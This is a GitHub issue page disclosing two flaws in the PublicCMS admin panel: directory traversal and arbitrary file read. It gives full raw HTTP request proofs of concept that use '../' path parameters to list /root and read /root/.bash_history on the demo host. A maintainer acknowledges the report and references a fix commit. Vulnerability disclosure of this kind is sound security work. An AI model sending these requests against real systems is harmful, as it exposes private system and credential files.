We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
First you should login demo account,
Directory Traversal POC:
GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1 Host: cms.publiccms.com Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Referer: http://cms.publiccms.com/admin/ Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: ** Connection: close
Arbitrary file read POC:
GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1 Host: cms.publiccms.com Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Referer: http://cms.publiccms.com/admin/ Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: ** Connection: close
You can use these two poc brower system dir and read any file~
The text was updated successfully, but these errors were encountered:
4fe81a5 Thank you for finding this very serious problem
Sorry, something went wrong.
No branches or pull requests
First you should login demo account,
Directory Traversal POC:
Arbitrary file read POC:
You can use these two poc brower system dir and read any file~
The text was updated successfully, but these errors were encountered: